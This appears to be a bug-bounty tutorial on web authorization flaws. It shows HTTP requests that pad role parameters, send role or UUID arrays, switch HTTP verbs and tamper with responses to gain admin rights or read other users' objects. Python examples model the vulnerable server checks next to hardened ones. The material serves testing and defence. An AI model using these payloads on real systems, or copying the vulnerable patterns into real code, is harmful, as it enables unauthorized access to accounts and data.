Preface
This is the second installment in the privilege-escalation series; the previous installment is:
Main text
Method 8
Try padding the role parameter with a delimiter such as `|`, `,` or `%20` (a URL-encoded space), so that the value carries both your real role and the target role, e.g. `Role=admin,user`. A server that validates the value by checking that it contains your real role, but then acts on the first token, grants the elevated role.
POST /privilege-escalation HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

Role=admin,user
Method 9
Try switching the Content-Type to application/json and sending the UUID as an array containing both the victim's UUID and your own, e.g. {"UUID":["victim-UUID","me-UUID"]}. If the ownership check only requires that one element of the array belongs to you, the victim's object may be returned or modified alongside yours (an IDOR).
POST /idor HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"UUID":["victim-UUID","me-UUID"]}
Method 10
Try switching the Content-Type to application/json and sending the role as an array, e.g. {"Role":["admin","user"]}. This is the JSON form of method 8: the array passes a "contains my role" check while the first element is the one that takes effect, which may result in privilege escalation.
POST /privilege-escalation HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"Role":["admin","user"]}
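To make the bug class behind methods 8, 9 and 10 concrete, here is an added Python example (not code from the original post or from the referenced tweet): a toy server-side authorizer that validates one view of a submitted value and then acts on another, next to a hardened version that derives privilege only from the session and authorizes every object reference individually. The field names Role and UUID and the delimiters come from the post; the session handling, the STORE contents and the function names are assumptions made for illustration.

```python
# Added example, not code from the original post or from the referenced tweet: a toy
# server-side authorizer that reproduces the bug class behind methods 8-10 (the server
# validates one view of a request value and then acts on another), next to a hardened
# version. The field names Role/UUID and the delimiters come from the post; the session
# handling, STORE contents and function names are assumptions for illustration.
import json
from urllib.parse import parse_qs

DELIMITERS = (",", "|", " ")  # separators suggested in the post; %20 decodes to a space

# Constructed sample data for the IDOR case (method 9).
STORE = {
    "me-UUID": {"owner": "me-UUID", "email": "me@example.com"},
    "victim-UUID": {"owner": "victim-UUID", "email": "victim@example.com"},
}


def parse_body(content_type, body):
    """Decode a form-urlencoded or JSON body into {field: value}; value is a str or a list."""
    if content_type.startswith("application/json"):
        return json.loads(body)
    return {k: v[0] for k, v in parse_qs(body).items()}


def as_list(value):
    """Normalise 'admin,user', 'admin|user', 'admin user' or ['admin', 'user'] to a token list."""
    if isinstance(value, list):
        return [str(v) for v in value]
    for d in DELIMITERS:
        if d in value:
            return value.split(d)
    return [value]


def vulnerable_effective_role(content_type, body, session_role):
    """Validation asks 'does the submitted value contain my real role?', which both
    'admin,user' and ["admin", "user"] satisfy for a plain user; the effective role is
    then taken from the first token, i.e. 'admin'."""
    submitted = parse_body(content_type, body).get("Role", session_role)
    if not isinstance(submitted, (str, list)) or session_role not in submitted:
        return None
    return as_list(submitted)[0]


def hardened_effective_role(content_type, body, session_role):
    """Privilege never comes from the request. If a Role field is present it must be a
    single scalar string equal to the server-side session role; anything else is rejected."""
    submitted = parse_body(content_type, body).get("Role")
    if submitted is not None and (not isinstance(submitted, str) or submitted != session_role):
        return None
    return session_role


def vulnerable_records(content_type, body, session_uuid, store):
    """Method 9: the check passes if *any* UUID in the array is mine, and then *every*
    UUID in the array is served, including the victim's."""
    uuids = as_list(parse_body(content_type, body).get("UUID", session_uuid))
    if session_uuid not in uuids:
        return None
    return [store[u] for u in uuids if u in store]


def hardened_records(content_type, body, session_uuid, store):
    """Every object reference is authorised individually against the session."""
    uuids = as_list(parse_body(content_type, body).get("UUID", session_uuid))
    if any(u != session_uuid for u in uuids):
        return None
    return [store[session_uuid]]
```

The same normaliser handles the delimiter variants from method 8 and the JSON arrays from methods 9 and 10, which is why all of them are worth trying against one endpoint: a server that accepts more than one representation of a value will often validate and consume different ones.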
Method 11
Try changing the HTTP method of the request that carries the UUID parameter, for example between POST, GET, PUT and DELETE. If the ownership check was registered only for the verb the front end uses, the other verbs reach the handler unguarded.
GET /idor?uuid=Victim-UUID HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
Method 12
Try changing the HTTP method of the request that carries the role parameter, for example between POST, GET, PUT and DELETE, moving the parameter into the query string for GET.
GET /privilege-escalation?Role=admin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
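The following added Python example (not code from the original post or from the referenced tweet) shows why verb switching in methods 11 and 12 works: a toy router whose authorization checks are keyed on (verb, path), so a GET or PUT to the same path runs the handler with no check at all, next to a hardened dispatcher that binds the check to the resource and refuses verbs that were not explicitly allowed. The paths and parameter names are taken from the post's requests; the Request class, the handlers, the session layout and make_db() are assumptions made for illustration.

```python
# Added example, not code from the original post or the referenced tweet: a toy request
# router showing why switching the verb (methods 11 and 12) can skip an authorization
# check, next to a hardened dispatcher. The paths and parameter names come from the
# post's requests; Request, the handlers, the session layout and make_db() are
# assumptions for illustration.
from urllib.parse import parse_qs, urlsplit


class Request:
    def __init__(self, method, target, session, body=""):
        parts = urlsplit(target)
        self.method, self.path, self.session = method, parts.path, session
        # Many frameworks merge query-string and body parameters into one bag, so a
        # value the front end only ever sends in a POST body is also reachable as
        # GET /path?Role=admin.
        self.params = {k: v[0] for k, v in parse_qs(parts.query + "&" + body).items()}


def make_db():
    """Constructed sample data: two accounts, the caller and a victim."""
    return {
        "me-UUID": {"role": "user", "email": "me@example.com"},
        "Victim-UUID": {"role": "user", "email": "victim@example.com"},
    }


# Handlers: the business logic is shared by every verb that reaches it.
def change_role(req, db):
    me = db[req.session["user"]]
    me["role"] = req.params.get("Role", me["role"])
    return 200, me["role"]


def fetch_record(req, db):
    uid = req.params.get("uuid", req.session["user"])
    return (200, db[uid]) if uid in db else (404, None)


HANDLERS = {"/privilege-escalation": change_role, "/idor": fetch_record}


# Authorization predicates.
def require_admin(req):
    return req.session.get("role") == "admin"


def owns_record(req):
    return req.params.get("uuid", req.session["user"]) == req.session["user"]


# Vulnerable: each check was registered for the one verb the front end uses, so the
# router finds no check for GET/PUT/DELETE and runs the handler unguarded.
CHECKS_BY_VERB = {
    ("POST", "/privilege-escalation"): require_admin,
    ("POST", "/idor"): owns_record,
}


def dispatch_vulnerable(req, db):
    handler = HANDLERS.get(req.path)
    if handler is None:
        return 404, None
    check = CHECKS_BY_VERB.get((req.method, req.path))
    if check is not None and not check(req):
        return 403, None
    return handler(req, db)


# Hardened: the check is bound to the resource rather than to a verb, and verbs that
# were not explicitly allowed for the resource are refused before any handler runs.
ALLOWED_VERBS = {"/privilege-escalation": {"POST"}, "/idor": {"GET", "POST"}}
CHECKS_BY_PATH = {"/privilege-escalation": require_admin, "/idor": owns_record}


def dispatch_hardened(req, db):
    handler = HANDLERS.get(req.path)
    if handler is None:
        return 404, None
    if req.method not in ALLOWED_VERBS.get(req.path, set()):
        return 405, None
    if not CHECKS_BY_PATH[req.path](req):
        return 403, None
    return handler(req, db)
```

When testing, send the same parameters over every verb the server will route (and, where the framework supports them, method-override headers or `_method` fields); when fixing, attach the authorization check to the resource and reject any verb that was not deliberately enabled.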
Method 13
Submit the victim's UUID, then try manipulating the response, for example rewriting an error message in the original response into the success message the client expects; this may bypass the authorization check. Note that a response rewrite only ever defeats a check enforced in the client: the finding is confirmed only if the action the client then performs is accepted by the server.
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://www.company.com
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Content-Length: length

{ "msg" : "Right To Do Next Action" }
Method 14
Try to gain privilege escalation by manipulating flags in the response, for example changing false to true in an admin field. As with method 13, this only unlocks functionality the client hides; whether the server actually honours the subsequent privileged requests is what determines impact.
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://www.company.com
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Content-Length: length

{ "admin" : "true" }
References
https://twitter.com/GodfatherOrwa/status/1438162075218550792